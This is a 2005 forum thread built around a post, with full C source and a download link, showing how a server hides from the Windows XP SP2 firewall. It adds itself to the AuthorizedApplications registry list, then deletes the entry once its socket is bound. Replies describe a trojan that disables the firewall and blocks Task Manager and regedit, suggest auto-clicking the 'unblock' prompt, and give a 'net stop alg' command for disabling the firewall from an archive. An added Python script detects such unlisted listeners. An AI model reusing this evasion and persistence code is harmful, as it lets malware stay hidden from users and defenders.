This article is about how to open up a listening port from Windows XP SP2 without being logged/listed as open:
Quote: 1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice
#Dedicated to Katka H. from Levoca
How to avoid detection of a server application by the Windows XP SP2 firewall
###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...
This trick uses only modification of registry keys. The Windows XP SP2 firewall has
a list of allowed programs in the registry which are not blocked. If you add a new key
to it, your server (malware or trojan) can run freely.
The server can also be invisible in the following list:
start->control panel->windows firewall->exceptions
It will become invisible from this list because after you create the socket, you can remove the registry string value of your server and the connection won't be aborted.
Another way to bypass the SP2 firewall is to create the trojan not as a server, but
as a client.
##################################################################
http://taekwondo-itf.szm.sk/bugg.zip
Test :
#c:\bugg.exe Server running on port 2001
connect to server with :
#telnet localhost 2001
##################################################################
Our Registry path is
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
and there you can create a string value:
Value name: C:\chat.exe
Value:      C:\chat.exe:*:Enabled:chat
NO SPACES!!! in the key name etc. _C:\chat.exe___
#################################################################
Tested on Windows XP Media Center Edition 2005 with integrated SP2
Source code
(the server uses the ezsocket lib)
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

/* Registry list of applications the SP2 firewall lets through (value name = exe path) */
#define FW_LIST_KEY "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List"

int main(int argc, char *argv[])
{
    char buffer[1024];
    char filename[1024];
    char fwvalue[1024];   /* "path:*:Enabled:name"; kept apart from the recv buffer */
    HKEY hKey;
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    /* The full path of this executable is both the value name and the first field of the value */
    GetModuleFileName(NULL, filename, sizeof(filename));
    strcpy(fwvalue, filename);
    strcat(fwvalue, ":*:Enabled:");
    strcat(fwvalue, "bugg");

    /* Opening this key with KEY_ALL_ACCESS requires administrative rights */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, FW_LIST_KEY, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
        fprintf(stderr, "RegOpenKeyEx failed\n");
        return 1;
    }
    /* REG_SZ data includes the terminating NUL */
    RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)fwvalue, strlen(fwvalue) + 1);

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
    fprintf(stdout, " This is not trojan \n");
    fprintf(stdout, " Opened port is :2001 \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
    Sleep(3000);   /* Win32 Sleep() takes milliseconds; sleep(3) is the POSIX call */

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1) {
        RegCloseKey(hKey);
        return 0;
    }
    for (;;)
    {
        /* The socket is already bound, so removing the entry only hides it from the Exceptions tab */
        RegDeleteValue(hKey, filename);
        fd_size = sizeof(struct sockaddr_in);
        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
        {
            perror("accept");
            continue;
        }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sent: Hello World\r\n");
        temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
        if (temp < 0)          /* the original indexed buffer[-1] on a recv error */
            temp = 0;
        buffer[temp] = '\0';
        fprintf(stdout, "Received: %s\r\n", buffer);
        ezclose_socket(new_fd);
        /* Restore the entry between clients (the original wrote the received data here by mistake) */
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)fwvalue, strlen(fwvalue) + 1);
        if (!strcmp(buffer, "quit"))
            break;
    }
    ezsocket_exit();
    RegCloseKey(hKey);
    return 0;
}
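The listing above shows why the Exceptions tab cannot be trusted on its own: the entry is removed once the socket is bound, and the port stays open. As an added example that is not part of the original post, the following Python script reconciles constructed `netstat -anob` output against constructed AuthorizedApplications\List values and reports every listening image that has no Enabled exception; the sample data and the `[image.exe]` line format are assumptions.

```python
import re

# Constructed sample of the exception list: value name = exe path,
# value = "path:scope:Enabled|Disabled:display name" (format from the post).
SAMPLE_EXCEPTIONS = {
    r"C:\chat.exe": r"C:\chat.exe:*:Enabled:chat",
    r"C:\old\game.exe": r"C:\old\game.exe:*:Disabled:game",
}

# Constructed sample of `netstat -anob` output: each socket line is
# assumed to be followed by the owning image name in brackets.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:2001           0.0.0.0:0              LISTENING       1504
  [bugg.exe]
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING       1222
  [chat.exe]
  TCP    0.0.0.0:6000           0.0.0.0:0              LISTENING       1300
  [game.exe]
  TCP    127.0.0.1:1027         127.0.0.1:2001         ESTABLISHED     1600
  [telnet.exe]
"""

_ENTRY = re.compile(r"^(?P<path>.+?):(?P<scope>[^:]*):(?P<state>Enabled|Disabled):(?P<name>.*)$")
_LISTEN = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")

def parse_exception(value_name, value):
    """Split one AuthorizedApplications\\List value; flag a name/path mismatch."""
    m = _ENTRY.match(value)
    if not m:
        raise ValueError("malformed exception value: %r" % value)
    d = m.groupdict()
    d["enabled"] = d.pop("state") == "Enabled"
    d["consistent"] = d["path"].lower() == value_name.lower()   # value name must equal path
    return d

def parse_listeners(netstat_text):
    """Return [(port, pid, image)] for every TCP socket in LISTENING state."""
    out, pending = [], None
    for line in netstat_text.splitlines():
        m = _LISTEN.match(line)
        if m:
            pending = (int(m.group(1)), int(m.group(2)))
        elif pending and line.strip().startswith("["):
            out.append(pending + (line.strip().strip("[]"),))
            pending = None
    return out

def unlisted_listeners(netstat_text, exceptions):
    """Listening images with no Enabled, consistent exception: what the trick leaves behind."""
    allowed = set()
    for name, value in exceptions.items():
        e = parse_exception(name, value)
        if e["enabled"] and e["consistent"]:
            allowed.add(e["path"].rsplit("\\", 1)[-1].lower())
    return [l for l in parse_listeners(netstat_text) if l[2].lower() not in allowed]
```

Running `unlisted_listeners(SAMPLE_NETSTAT, SAMPLE_EXCEPTIONS)` reports bugg.exe on 2001 (no entry at all) and game.exe on 6000 (entry present but Disabled), while chat.exe on 5000 is covered.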
Thanks, was looking for some information on SP2's firewall recently.
Heh, I wouldn't trust the XP firewall anymore than my headphones, even before this.
I made a trojan, and to prevent the XP SP2 firewall from doing anything... I just blocked the window name "windows security alert" so it won't display that stupid message. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan I have set by default to block task manager, msconfig, regedit, and windows security alert. So, once it's on, it's not easy to get off :). And the user can add their own blocks if they want.
Uh, it will not display the message, but I'm guessing that it will still block access.
You should set a loop to detect for that window to pop up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.
Quote from: Koga73 on September 14, 2005, 10:32:51 PM
I made a trojan, and to prevent the XP SP2 firewall from doing anything... I just blocked the window name "windows security alert" so it won't display that stupid message. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan I have set by default to block task manager, msconfig, regedit, and windows security alert. So, once it's on, it's not easy to get off :). And the user can add their own blocks if they want.
How incredibly annoying. People who program maliciously suck at life.
When the window closes, it doesn't block it, or permanently allow it. It just allows it that time, and next time it'll ask you again.
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
Quote from: Joe[e2] on September 15, 2005, 10:48:06 PM
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
Seriously, other than not letting you host games on B.net it's really got no purpose.
It blocks incoming traffic. That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others.
It's useful for preventing incoming attacks, like worms, but isn't terribly useful for blocking outbound traffic.
Windows Vista is supposed to have its firewall upgraded so that it does
Quote from: Mangix on September 25, 2005, 08:28:15 PM
Windows Vista is supposed to have its firewall upgraded so that it does
It does what? A dance? Blocks Sasser? Damn, it better.
blocking outgoing connections and maybe will fix the issue where malware can disable it
Quote from: Mangix on September 25, 2005, 08:47:31 PM
blocking outgoing connections and maybe will fix the issue where malware can disable it
As long as the user can disable it without a password, so can viruses. And people don't like having to put in a password, so that probably won't change.
XP firewall is easily disabled with an archivirus (sfx scripting)
all you have to do is set it to run this before extraction:
C:\Windows\system32\net.exe stop alg
This command will shut down the "Application Layer Gateway Service" which is responsible for correct functionality of the firewall.
and requires administrative access.
Mhm, I'm not a fan of this anyways since it makes it somewhat obvious that the system is compromised, just an example.
Quote from: Mangix on September 25, 2005, 08:28:15 PM
Windows Vista is supposed to have its firewall upgraded so that it does
Isn't Vista just supposed to come with Windows One Care?
One Care is for live.com, Vista comes with Windows Defender (Formerly Windows Anti-Spyware Beta2)
Quote from: Warriorx86
One Care is for live.com, Vista comes with Windows Defender (Formerly Windows Anti-Spyware Beta2)
The "Anti-Spyware" that teamed up with Gator?
You mean bought out? Check Defender, it detects and removes it if it is even present. I really don't know why you even start with this *shrug*